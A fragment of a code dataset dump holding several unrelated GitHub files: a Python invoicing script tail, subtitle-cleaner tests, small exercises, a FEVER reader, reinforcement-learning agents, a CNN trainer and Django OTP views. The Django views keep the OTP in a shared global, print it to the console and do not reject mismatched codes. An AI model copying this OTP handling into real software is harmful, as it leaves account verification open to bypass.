self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura no es 2.X\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n if polissa.facturacio_potencia != 'icp':\n self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura amb maximetre\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n if polissa.no_estimable:\n self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura no estimable\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} ha facturat i te lectures a lectures despres de\"\n \"la última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n\nif __name__ == \"__main__\":\n # s = Searcher()\n # s.run()\n s = SearchStrandedAndDelayed()\n s.run()\n","repo_name":"Som-Energia/somenergia-scripts","sub_path":"invoicing/measurefixing/search_stranded_and_delayed_contracts.py","file_name":"search_stranded_and_delayed_contracts.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4206563641","text":"import unittest\nfrom pysubs2 import SSAFile\nfrom module.cleaner import Cleaner\n\nclass CleanerTest(unittest.TestCase):\n \n def test_clean_misc_symbol(self):\n raw_misc_symbol = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n ⦅そういうものだよ みんなとの冒険だって➡\n \"\"\"\n\n cleaned_misc_symbol = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n そういうものだよ みんなとの冒険だって\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_misc_symbol)\n cleaned_subs = cleaned_subs[0].text\n\n subs = SSAFile.from_string(raw_misc_symbol)\n subs = Cleaner.clean_misc_symbol(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n \n def test_clean_sound_effects(self):\n raw_sound_effect = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n (アイゼン)フリーレン(ドアを閉める音)\n 魂の眠る地を探して\n \"\"\"\n \n cleaned_sound_effect = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_sound_effect)\n cleaned_subs = cleaned_subs[0].text\n\n subs = SSAFile.from_string(raw_sound_effect)\n subs = Cleaner.clean_sound_effects(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n\n\n def test_strip_whitespace(self):\n whitespace = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n  フリーレン\n 魂の眠る地を探して\n \"\"\"\n \n cleaned_whitespace = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_whitespace)\n cleaned_subs = cleaned_subs[0].text\n \n subs = SSAFile.from_string(whitespace)\n subs = Cleaner.strip_whitespace(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n\n def test_apply_clean_style(self):\n style_name = 'CleanStyle'\n\n sub = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n subs = SSAFile.from_string(sub)\n styled_subs = Cleaner.clean_style(subs)\n styled_subs_style = styled_subs[0].style\n\n self.assertEqual(styled_subs_style, style_name)\n\n\n def test_clean_romaji(self):\n raw_romaji = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n 齢(よわい)12歳にして最強クラスの狩竜人\n \"\"\"\n \n cleaned_romaji = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n 齢12歳にして最強クラスの狩竜人\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_romaji)\n cleaned_subs = cleaned_subs[0].text\n\n subs 
= SSAFile.from_string(raw_romaji)\n subs = Cleaner.clean_romaji(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)","repo_name":"wanhuz/kome","sub_path":"tests/test_cleaner.py","file_name":"test_cleaner.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73388849706","text":"\n\n\nprimes = [2,3,5,7]\ncount = 9\n\n\nimport time\n\n\nstart = time.time()\n\n\n# returns 0 if n is prime, otherwise the smallest divisor found\ndef is_prime(n):\n\tif n & 1 == 0:\n\t\treturn 2\n\n\td = 3\n\twhile d * d <= n:\n\t\tif n % d == 0:\n\t\t\treturn d\n\n\t\td = d + 2\n\n\n\treturn 0\n\n\nwhile len(primes) < 10001:\n\tif is_prime(count) == 0:\n\t\tprimes.append(count)\n\n\tcount += 2\n\nprint(primes[-1], len(primes))\nend = time.time()\nprint('exec time: ', end-start)\n","repo_name":"zachbroad/euler","sub_path":"10001_prime.py","file_name":"10001_prime.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7155134578","text":"def digits_sum(number):\n odd_sum = 0\n even_sum = 0\n for digit in number:\n if int(digit) % 2 == 0:\n even_sum += int(digit)\n else:\n odd_sum += int(digit)\n return even_sum, odd_sum\n\n\nsingle_number = input()\neven, odd = digits_sum(single_number)\nprint(f'Odd sum = {odd}, Even sum = {even}')","repo_name":"IvaDrRad/SoftUni-Python","sub_path":"Programming-Fundamentals-Python/Functions/odd_and_even_sum.py","file_name":"odd_and_even_sum.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44076040870","text":"\"\"\"Project logger module.\"\"\"\n\nimport logging\nimport os\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\n\nLOGS_PATH = 'calls/logging/logs'\nBACKUP_COUNT = 30\n\nos.makedirs(LOGS_PATH, exist_ok=True)\n\n\nclass Logger(object):\n \"\"\"Default logger for project.\"\"\"\n\n logger = logging.getLogger('calls_logger')\n handler_log_rotation = TimedRotatingFileHandler(\n f'{LOGS_PATH}/calls_loggs.log',\n when='D',\n interval=1,\n backupCount=BACKUP_COUNT,\n encoding='utf-8',\n )\n handler_stdout = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] [%(name)s] %(message)s')\n\n\ncalls_logger = Logger()\nlogger = calls_logger.logger\nlogger.setLevel(logging.INFO)\ncalls_logger.handler_log_rotation.setFormatter(calls_logger.formatter)\ncalls_logger.handler_stdout.setFormatter(calls_logger.formatter)\nlogger.addHandler(calls_logger.handler_log_rotation)\nlogger.addHandler(calls_logger.handler_stdout)\n","repo_name":"Slavchick12/calls","sub_path":"calls/calls/logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43177295890","text":"# return masked string\ndef maskify(cc):\n print(cc)\n to_string = str(cc)\n # replace everything except the last four characters with '#'\n masked = '#' * (len(to_string) - 4)\n unmasked = to_string[-4:]\n final = masked + unmasked\n return final\n\n\n\n\n\ncc1 = 4450500016172487\ncc2 = 4450008092914556\nstring_test1 = 'reeeeeaaaaaaalllllllllyyyyyyyyyyyyyy'\nstring_test2 = 
'skippyTheSpaceCowboy'\n\nprint(maskify(cc1))\nprint('\\n')\nprint(maskify(cc2))\nprint('\\n')\nprint(maskify(string_test1))\nprint('\\n')\nprint(maskify(string_test2))\nprint('\\n')\n\n","repo_name":"borkusgod/CodeWarsChallengeFolder","sub_path":"Python/7kyu/credit_card_mask/credit_card_mask.py","file_name":"credit_card_mask.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6247587753","text":"import collections\nimport json\nimport logging\nfrom typing import List, Tuple\n\nimport nltk\nimport torch\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom tqdm import tqdm\n\nfrom data.data_instance import QAFullInputFeatures, QAFullExample, ModelState, FullResult\nfrom general_util import utils\n\nlogger = logging.getLogger(__name__)\n\n\nclass FeverReader(object):\n def __init__(self):\n super(FeverReader, self).__init__()\n self.sentence_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n self.yesno_cate = utils.CategoricalAccuracy(['yes', 'no'])\n\n def read(self, input_file):\n logger.info(f'Reading data set from {input_file}...')\n with open(input_file, 'r') as f:\n data = json.load(f)\n\n def is_whitespace(ch):\n if ch == \" \" or ch == \"\\t\" or ch == \"\\r\" or ch == \"\\n\" or ord(ch) == 0x202F:\n return True\n return False\n\n examples = []\n for instance_id in tqdm(data, desc=f'Reading examples from {input_file}...', total=len(data)):\n claim = data[instance_id]['claim']\n sentence_id = data[instance_id]['evidence']\n label = data[instance_id]['label'].lower()\n passage = data[instance_id]['passage']\n\n doc_tokens = []\n prev_is_whitespace = True\n char_to_word_offset = []\n for c in passage:\n if is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n # Split context into sentences\n sentence_start_list, sentence_end_list = utils.split_sentence(passage, self.sentence_tokenizer)\n sentence_span_list = []\n for c_start, c_end in zip(sentence_start_list, sentence_end_list):\n t_start = char_to_word_offset[c_start]\n t_end = char_to_word_offset[c_end]\n sentence_span_list.append((t_start, t_end))\n\n if label == 'yes':\n answer_choice = 0\n elif label == 'no':\n answer_choice = 1\n else:\n raise RuntimeError(f'Wrong label for {label}')\n\n example = QAFullExample(\n qas_id=instance_id,\n question_text=claim,\n doc_tokens=doc_tokens,\n sentence_span_list=sentence_span_list,\n orig_answer_text=\"\",\n start_position=None,\n end_position=None,\n sentence_id=sentence_id,\n is_impossible=answer_choice,\n ral_start_position=None,\n ral_end_position=None\n )\n examples.append(example)\n return examples\n\n @staticmethod\n def convert_examples_to_features(examples: List[QAFullExample], tokenizer: BertTokenizer, max_seq_length: int, doc_stride: int,\n max_query_length: int, is_training: bool):\n unique_id = 1000000000\n features = []\n for (example_index, example) in tqdm(enumerate(examples), desc='Converting examples to features..', total=len(examples)):\n query_tokens = tokenizer.tokenize(example.question_text)\n\n if len(query_tokens) > max_query_length:\n query_tokens = query_tokens[-max_query_length:]\n\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = []\n for (i, token) in enumerate(example.doc_tokens):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = 
tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n tok_to_orig_index.append(i)\n all_doc_tokens.append(sub_token)\n\n sentence_spans = []\n for (start, end) in example.sentence_span_list:\n piece_start = orig_to_tok_index[start]\n if end < len(example.doc_tokens) - 1:\n piece_end = orig_to_tok_index[end + 1] - 1\n else:\n piece_end = len(all_doc_tokens) - 1\n sentence_spans.append((piece_start, piece_end))\n\n max_tokens_for_doc = max_seq_length - len(query_tokens) - 3\n\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset\n if length > max_tokens_for_doc:\n length = max_tokens_for_doc\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, doc_stride)\n\n sentence_spans_list = []\n sentence_ids_list = []\n for span_id, doc_span in enumerate(doc_spans):\n span_start = doc_span.start\n span_end = span_start + doc_span.length - 1\n\n span_sentence = []\n sen_ids = []\n for sen_idx, (sen_start, sen_end) in enumerate(sentence_spans):\n if sen_end < span_start:\n continue\n if sen_start > span_end:\n break\n span_sentence.append((max(sen_start, span_start), min(sen_end, span_end)))\n sen_ids.append(sen_idx)\n\n sentence_spans_list.append(span_sentence)\n sentence_ids_list.append(sen_ids)\n\n ini_sen_id: List[int] = example.sentence_id\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n\n token_to_orig_map = {}\n token_is_max_context = {}\n tokens = [\"[CLS]\"] + query_tokens + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n doc_start = doc_span.start\n doc_offset = len(query_tokens) + 2\n sentence_list = sentence_spans_list[doc_span_index]\n cur_sentence_list = []\n for sen_id, sen in enumerate(sentence_list):\n new_sen = (sen[0] - doc_start + doc_offset, sen[1] - doc_start + doc_offset)\n cur_sentence_list.append(new_sen)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n is_max_context = utils.check_is_max_context(doc_spans, doc_span_index, split_token_index)\n\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n input_mask = [1] * len(input_ids)\n\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == len(input_mask) == len(segment_ids) == max_seq_length\n\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n\n \"\"\"\n There are multiple evidence sentences in some examples. 
To avoid multi-label setting,\n we choose to use the evidence sentence with the max length.\n \"\"\"\n span_sen_id = -1\n max_evidence_length = 0\n for piece_sen_id, sen_id in enumerate(sentence_ids_list[doc_span_index]):\n if sen_id in ini_sen_id:\n evidence_length = cur_sentence_list[piece_sen_id][1] - cur_sentence_list[piece_sen_id][0]\n if evidence_length > max_evidence_length:\n max_evidence_length = evidence_length\n span_sen_id = piece_sen_id\n meta_data = {\n 'span_sen_to_orig_sen_map': sentence_ids_list[doc_span_index]\n }\n\n if span_sen_id == -1:\n answer_choice = 0\n else:\n answer_choice = example.is_impossible + 1\n\n features.append(QAFullInputFeatures(\n qas_id=example.qas_id,\n unique_id=unique_id,\n example_index=example_index,\n doc_span_index=doc_span_index,\n sentence_span_list=cur_sentence_list,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n is_impossible=answer_choice,\n sentence_id=span_sen_id,\n start_position=None,\n end_position=None,\n ral_start_position=None,\n ral_end_position=None,\n meta_data=meta_data\n ))\n unique_id += 1\n return features\n\n def write_predictions(self, all_examples, all_features, all_results: List[FullResult], output_prediction_file: str = None,\n null_score_diff_threshold: float = 0.0):\n self.yesno_cate.reset()\n logger.info(\"Writing predictions to: %s\" % output_prediction_file)\n\n example_index_to_features = collections.defaultdict(list)\n for feature in all_features:\n example_index_to_features[feature.example_index].append(feature)\n\n unique_id_to_result = {}\n for result in all_results:\n unique_id_to_result[result.unique_id] = result\n\n all_predictions = collections.OrderedDict()\n\n for (example_index, example) in enumerate(all_examples):\n features = example_index_to_features[example_index]\n\n max_diff = -1000000\n max_diff_yes_logit = 0\n max_diff_no_logit = 0\n for (feature_index, feature) in enumerate(features):\n result = unique_id_to_result[feature.unique_id]\n choice_logits = result.choice_logits\n non_null_logit = choice_logits[1] + choice_logits[2]\n yes_logit = choice_logits[1]\n no_logit = choice_logits[2]\n null_logit = choice_logits[0]\n diff = non_null_logit - null_logit\n if diff > max_diff:\n max_diff = diff\n max_diff_yes_logit = yes_logit\n max_diff_no_logit = no_logit\n\n if max_diff_yes_logit > max_diff_no_logit:\n final_text = 'yes'\n scores = max_diff_yes_logit\n else:\n final_text = 'no'\n scores = max_diff_no_logit\n all_predictions[example.qas_id] = {\n 'answer': final_text,\n 'scores': scores\n }\n\n gold_label = 'yes' if example.is_impossible == 0 else 'no'\n self.yesno_cate.update(gold_label, final_text)\n\n logger.info('Yes/No Metric: %s' % self.yesno_cate)\n\n if output_prediction_file is not None:\n with open(output_prediction_file, 'w') as f:\n json.dump(all_predictions, f, indent=2)\n return all_predictions\n\n @staticmethod\n def data_to_tensors(all_features: List[QAFullInputFeatures]):\n all_input_ids = torch.LongTensor([f.input_ids for f in all_features])\n all_segment_ids = torch.LongTensor([f.segment_ids for f in all_features])\n all_input_mask = torch.LongTensor([f.input_mask for f in all_features])\n all_answer_choice = torch.LongTensor([f.is_impossible for f in all_features])\n all_sentence_ids = torch.LongTensor([f.sentence_id for f in all_features])\n all_feature_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n\n return all_input_ids, 
all_segment_ids, all_input_mask, all_answer_choice, all_sentence_ids, all_feature_index\n\n @staticmethod\n def generate_inputs(batch: Tuple, all_features: List[QAFullInputFeatures], model_state, do_label=False):\n assert model_state in ModelState\n feature_index = batch[5].tolist()\n sentence_span_list = [all_features[idx].sentence_span_list for idx in feature_index]\n inputs = {\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'sentence_span_list': sentence_span_list\n }\n if model_state == ModelState.Test:\n return inputs\n if model_state == ModelState.Train or model_state == ModelState.Evaluate:\n inputs['answer_choice'] = batch[3]\n inputs['sentence_ids'] = batch[4]\n\n return inputs\n","repo_name":"SparkJiao/Self-Training-MRC","sub_path":"reader/fever_reader.py","file_name":"fever_reader.py","file_ext":"py","file_size_in_byte":13327,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"28750099425","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n리스트 = [\"가\", \"나\", \"다\", \"라\"]\nfor i in 리스트[::-1]:\n print(i)\n# Slice the list's values in reverse order using the [::-1] index.\n# \"for i in 리스트\" means: put each element of the list into i; running print(i) then outputs them in order.\n\n","repo_name":"baesoyeon/MSE_Python","sub_path":"ex150.py","file_name":"ex150.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72192192107","text":"import numpy as np\nimport random\n\nfrom utils import draw_episode_steps\nfrom utils import draw_grid\n\n\nclass TDAgent(object):\n\n def __init__(self, env, epsilon, gamma, alpha=0.1):\n self.env = env\n self.gamma = gamma\n self.alpha = alpha\n self.epsilon = epsilon # explore & exploit\n self.init_epsilon = epsilon\n\n self.P = np.zeros((self.env.num_s, self.env.num_a))\n\n self.V = np.zeros(self.env.num_s)\n self.Q = np.zeros((self.env.num_s, self.env.num_a))\n\n self.step_set = [] # store steps of each episode\n self.avg_step_set = [] # store average steps of each 100 episodes\n self.episode = 1\n self.step = 0\n self.max_episodes = 5000\n\n # initialize random policy\n for s in range(self.env.num_s):\n poss = self.env.allow_actions(s)\n for a in poss:\n self.P[s][a] = 1.0 / len(poss)\n\n self.curr_s = None\n self.curr_a = None\n\n def predict(self, episode=1000):\n for e in range(episode):\n curr_s = self.env.reset() # new episode\n while not self.env.is_terminal(curr_s): # for every time step\n a = self.select_action(curr_s, policy='greedy')\n r = self.env.rewards(curr_s, a)\n next_s = self.env.next_state(curr_s, a)\n self.V[curr_s] += self.alpha \\\n * (r+self.gamma*self.V[next_s] - self.V[curr_s])\n curr_s = next_s\n # result display\n draw_grid(self.env, self, p=True, v=True, r=True)\n\n def control(self, method):\n assert method in (\"qlearn\", \"sarsa\")\n\n if method == \"qlearn\":\n agent = Qlearn(self.env, self.epsilon, self.gamma)\n else:\n agent = SARSA(self.env, self.epsilon, self.gamma)\n\n while agent.episode < self.max_episodes:\n agent.learn(agent.act())\n\n # result display\n draw_grid(self.env, agent, p=True, v=True, r=True)\n # draw episode steps\n draw_episode_steps(agent.avg_step_set)\n\n def update_policy(self):\n # update according to Q value\n poss = self.env.allow_actions(self.curr_s)\n # Q values of all allowed actions\n qs = self.Q[self.curr_s][poss]\n q_maxs = [q for q in qs if q == max(qs)]\n # update probabilities\n for i, a in enumerate(poss):\n self.P[self.curr_s][a] = \\\n 
1.0 / len(q_maxs) if qs[i] in q_maxs else 0.0\n\n def select_action(self, state, policy='egreedy'):\n poss = self.env.allow_actions(state) # possible actions\n if policy == 'egreedy' and random.random() < self.epsilon:\n a = random.choice(poss)\n else: # greedy action\n pros = self.P[state][poss] # probabilities for possible actions\n best_a_idx = [i for i, p in enumerate(pros) if p == max(pros)]\n a = poss[random.choice(best_a_idx)]\n return a\n\n\nclass SARSA(TDAgent):\n\n def __init__(self, env, epsilon, gamma):\n super(SARSA, self).__init__(env, epsilon, gamma)\n self.reset_episode()\n\n def act(self):\n s = self.env.next_state(self.curr_s, self.curr_a)\n a = self.select_action(s, policy='egreedy')\n r = self.env.rewards(self.curr_s, self.curr_a)\n r -= 0.01 # a bit negative reward for every step\n return [self.curr_s, self.curr_a, r, s, a]\n\n def learn(self, exp):\n s, a, r, n_s, n_a = exp\n\n if self.env.is_terminal(s):\n target = r\n else:\n target = r + self.gamma * self.Q[n_s][n_a]\n self.Q[s][a] += self.alpha * (target - self.Q[s][a])\n\n # update policy\n self.update_policy()\n\n if self.env.is_terminal(s):\n self.V = np.sum(self.Q, axis=1)\n print('episode %d step: %d epsilon: %f' %\n (self.episode, self.step, self.epsilon))\n self.reset_episode()\n self.epsilon -= self.init_epsilon / 10000\n # record per 100 episode\n if self.episode % 100 == 0:\n self.avg_step_set.append(\n np.sum(self.step_set[self.episode-100: self.episode])/100)\n else: # shift state-action pair\n self.curr_s = n_s\n self.curr_a = n_a\n self.step += 1\n\n def reset_episode(self):\n # start a new episode\n self.curr_s = self.env.reset()\n self.curr_a = self.select_action(self.curr_s, policy='egreedy')\n self.episode += 1\n self.step_set.append(self.step)\n self.step = 0\n\n\nclass Qlearn(TDAgent):\n\n def __init__(self, env, epsilon, gamma):\n super(Qlearn, self).__init__(env, epsilon, gamma)\n self.reset_episode()\n\n def act(self):\n a = self.select_action(self.curr_s, policy='egreedy')\n s = self.env.next_state(self.curr_s, a)\n r = self.env.rewards(self.curr_s, a)\n r -= 0.01\n return [self.curr_s, a, r, s]\n\n def learn(self, exp):\n s, a, r, n_s = exp\n\n # Q-learning magic\n if self.env.is_terminal(s):\n target = r\n else:\n target = r + self.gamma * max(self.Q[n_s])\n self.Q[s][a] += self.alpha * (target - self.Q[s][a])\n\n self.update_policy()\n # shift to next state\n if self.env.is_terminal(s):\n self.V = np.sum(self.Q, axis=1)\n print('episode %d step: %d' % (self.episode, self.step))\n self.reset_episode()\n self.epsilon -= self.init_epsilon / self.max_episodes\n # record per 100 episode\n if self.episode % 100 == 0:\n self.avg_step_set.append(\n np.sum(self.step_set[self.episode-100: self.episode])/100)\n else:\n self.curr_s = n_s\n self.step += 1\n\n def reset_episode(self):\n self.curr_s = self.env.reset()\n self.episode += 1\n self.step_set.append(self.step)\n self.step = 0\n","repo_name":"borgwang/reinforce_py","sub_path":"algorithms/TD/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"10840544861","text":"import matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, Flatten, Dense, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimage_width, image_height = 150, 150\n\ndef create_model(p, input_shape=(64, 64, 1)):\n model = Sequential()\n\n model.add(Convolution2D(32, 
(3,3), input_shape=input_shape, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(32, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(64, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(64, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n\n\n model.add(Flatten())\n\n model.add(Dense(units=64, activation='relu'))\n model.add(Dropout(p))\n model.add(Dense(units=64, activation='relu'))\n model.add(Dense(units=64, activation='relu'))\n model.add(Dropout(p/2))\n model.add(Dense(units=1, activation='sigmoid'))\n\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef train(batch_size=32, epochs=10):\n train_datagen = ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n training_set = train_datagen.flow_from_directory('chest_xray/train', target_size=(image_width, image_height), batch_size=batch_size, class_mode='binary')\n\n test_set = test_datagen.flow_from_directory('chest_xray/test', target_size=(image_width, image_height), batch_size=batch_size, class_mode='binary')\n\n model = create_model(p=0.5, input_shape=(image_width, image_height, 3))\n training_history = model.fit_generator(training_set, steps_per_epoch=(training_set.n/training_set.batch_size), epochs=epochs, validation_data=test_set, validation_steps=(test_set.n/test_set.batch_size))\n\n model.save(\"pneumonia.h5\")\n model.save_weights(\"pneumonia_weight.h5\")\n print(\"Saved model on disk\")\n\n plot_training_history(training_history, 'acc', 'val_acc')\n\ndef plot_training_history(training_history, train_acc, test_acc):\n plt.plot(training_history.history[train_acc])\n plt.plot(training_history.history[test_acc])\n plt.title('Training History')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.savefig('pneumonia_training.png')\n plt.show()\n\ndef main():\n train(batch_size=32, epochs=50)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"puritatemcordis/Pneumonia-CNN","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24096450608","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status\nfrom rest_framework import serializers\nfrom rest_framework import response\nfrom rest_framework.serializers import Serializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.core.mail import EmailMultiAlternatives\nimport random\n# from rest_framework.decorators import list_route\n\nfrom .serializers import (\n UserRegistrationSerializer,\n UserLoginSerializer,\n verification_otpSerializer,\n # ChangePasswordSerializer\n # UserListSerializer\n)\n# from utils import res_codes\nimport jwt\nfrom .models import User\n\n# otp_send = random.randint(100000,999999)\nval_otp = None\n\nclass UserRegistrationView(APIView):\n serializer_class = UserRegistrationSerializer\n permission_classes = (AllowAny, )\n\n def post(self, request):\n otp_send = random.randint(100000, 999999)\n global val_otp\n def val_otp():\n return 
otp_send\n        serializer = self.serializer_class(data=request.data)\n        valid = serializer.is_valid(raise_exception=True)\n        if valid:\n            serializer.save()\n            print(\"<<<<<<<<<<<<<<\",otp_send)\n            # if otp_send is is_verified: \n            email = EmailMultiAlternatives('Confirmation mail.', f'verification otp is {otp_send}', 'sahilpuniawins@gmail.com', [\n                serializer.data['email']])\n            email.send()\n            status_code = status.HTTP_201_CREATED\n            \n\n            response = {\n                'success': True,\n                'statusCode': status_code,\n                'message': 'User successfully registered!',\n                'user': serializer.data\n            }\n\n            return Response(response, status=status_code)\n\nclass verification_otpAPIView(APIView):\n    def post(self, request):\n        ok = val_otp()\n        serializer = verification_otpSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            # reject the request when the submitted OTP does not match the issued one\n            if serializer.data['otp'] != ok:\n                print(\"otp not matched\")\n                response = {\n                    'success': False,\n                    'message': 'email otp is not matched',\n                    'user': serializer.data\n                }\n                return Response(response, status=status.HTTP_400_BAD_REQUEST)\n            return Response(serializer.data, status=status.HTTP_200_OK)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\ndef tiv():\n\n    pf = User.objects.filter()\n    for item in pf:\n        item.is_active = True\n        item.save() \n\n\n\n\nclass UserLoginView(APIView):\n    serializer_class = UserLoginSerializer\n    permission_classes = (AllowAny, )\n\n    def post(self, request):\n        serializer = self.serializer_class(data=request.data)\n        valid = serializer.is_valid(raise_exception=True)\n\n        if valid:\n            status_code = status.HTTP_200_OK\n\n            response = {\n                'success': True,\n                'statusCode': status_code,\n                'message': 'User logged in successfully',\n                'access': serializer.data['access'],\n                'refresh': serializer.data['refresh'],\n                'authenticatedUser': {\n                    'email': serializer.data['email'],\n                    # 'role': serializer.data['role']\n                }\n            }\n\n            return Response(response, status=status_code)\n\n\n# class idView(APIView):\n#     serializer_class = UserLoginSerializer\n#     permission_classes = (AllowAny, )\n\n#     def post(self, request):\n#         serializer = self.serializer_class(data=request.data)\n#         valid = serializer.is_valid(raise_exception=True)\n#         decode = jwt.decode(serializer.data['access'], options={\n#             \"verify_signature\": False})\n#         print(\">>>>>>>>>>>>>>>>>\", decode)\n#         id = decode.get(\"user_id\")\n\n#         if valid:\n#             status_code = status.HTTP_200_OK\n\n#             response = {\n#                 'id':id,\n#             }\n            \n\n#             return Response(response, status=status_code)\n\n\n","repo_name":"SahilpuniaDits/Django","sub_path":"otp/registerotp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
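The verification flow above hands the one-time code around through a module-level `val_otp` closure, which only survives a single process and a single pending registration. For comparison, a minimal issue/verify pair can be built from the standard library alone; this is a sketch with illustrative names, not code from that repository:

```python
import secrets
import hmac

def issue_otp() -> str:
    # six digits, zero-padded, drawn from a CSPRNG rather than random.randint
    return f"{secrets.randbelow(10**6):06d}"

def otp_matches(submitted: str, stored: str) -> bool:
    # constant-time comparison, so timing does not leak how many digits matched
    return hmac.compare_digest(submitted, stored)
```

In a Django app the issued code would typically be persisted on the user row or in the session together with an expiry, rather than held in process memory.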
